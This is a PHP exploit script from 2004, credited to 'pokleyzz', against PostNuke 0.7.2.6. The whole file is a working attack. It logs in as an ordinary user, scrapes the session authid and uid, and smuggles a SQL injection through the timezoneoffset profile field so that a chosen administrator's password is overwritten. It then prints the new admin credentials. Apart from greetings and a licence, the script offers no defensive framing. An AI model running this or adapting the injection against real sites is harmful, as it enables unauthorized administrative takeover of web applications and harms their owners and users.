#!/usr/bin/php -q Postnuke 0.7.2.6 > change admin password by pokleyzz change admin password by pokleyzz # 2nd January 2004 : 12:48 a.m # # bug found by pokleyzz (2nd January 2004) # # Requirement: # PHP 4.x with curl extension; # # Greet: # tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus , # s0cket370 , b0iler and ... # # Happy new year 2004 ... # # ---------------------------------------------------------------------------- # "TEH TARIK-WARE LICENSE" (Revision 1): # wrote this file. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a "teh tarik" in return. # ---------------------------------------------------------------------------- # (Base on Poul-Henning Kamp Beerware) # # */ if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit; } ini_set("max_execution_time","999999"); //$url = "http://127.0.0.1/hitb/apps/postnuke726/html"; if($argv[4]){ $username = $argv[1]; $userpass = $argv[2]; $url = $argv[3]; $adminname = $argv[4]; if ($argv[5]) $adminpass = $argv[5]; else $adminpass = $userpass; if ($argv[6]) $proxy = $argv[6]; } else { echo "Usage:\n\n ".$argv[0]." [admin password] [proxy]\n\n"; exit; } $action = "/user.php"; $i =0; $tmp = "char("; while ($i < strlen($adminname)){ $tmp .= ord(substr($adminname,$i,1)); $i++; if ($i < strlen($adminname)){ $tmp .= ","; } } $tmp .= ")"; $cadminname=$tmp; $i =0; $tmp = "char("; $madminpass = md5($adminpass); while ($i < strlen($madminpass)){ $tmp .= ord(substr($madminpass,$i,1)); $i++; if ($i < strlen($madminpass)){ $tmp .= ","; } } $tmp .= ")"; $cadminpass=$tmp; // login $postvar = "uname={$username}&pass={$userpass}&module=NS-User&op=login&url=1"; $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.$action); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar); $res=curl_exec ($ch); curl_close ($ch); $login = 0; $ares = explode("\n",$res); foreach ($ares as $line){ if (ereg("Set-Cookie",$line)){ $cookie = ereg_replace("Set-Cookie( )*:[ ]*","",$line); } if (ereg("HTTP-EQUIV=Refresh",$line)){ $login = 1; } } // succesfull login if ($login == 1){ echo "[x] Success login !!\n"; $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.$action."?op=edituser"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); $res=curl_exec ($ch); curl_close ($ch); $ares = explode("\n",$res); foreach ($ares as $line){ if (preg_match("/(name=\"authid\"\s+value=\".{32}\")/",$line, $matches) && !$authid){ $authid = preg_replace("/(name=\"authid\"\s+value=\"|\")/","",$matches[0]); } if (preg_match("/(name=\"uid\"\s+value=\".+\")/",$line, $matches) && !$uid){ $uid = preg_replace("/(name=\"uid\"\s+value=\"|\")/","",$matches[0]); } //echo $line; } if (strlen($authid) == 32 && (int)$uid > 0){ $tz = "1,pn_pass%3d{$cadminpass}+where+pn_uname%3d{$cadminname}/*"; $postvar = "name=&email=&femail=&url=&timezoneoffset={$tz}&user_avatar={$avatar}&user_icq=&user_aim=&user_yim=&user_msnm=&user_from=&user_occ=&user_intrest=&user_sig=&bio=&pass=&vpass=&uname={$username}&uid={$uid}&op=saveuser&authid={$authid}"; $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.$action); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); //curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar); $res=curl_exec ($ch); //echo $res; echo "[+] Success changing password. Please login as $adminname with $adminpass as password"; } else { echo "[-] Can't get authid or uid\n"; } } else { echo "[-] Login failed for $username with $userpass as password\n"; } ?>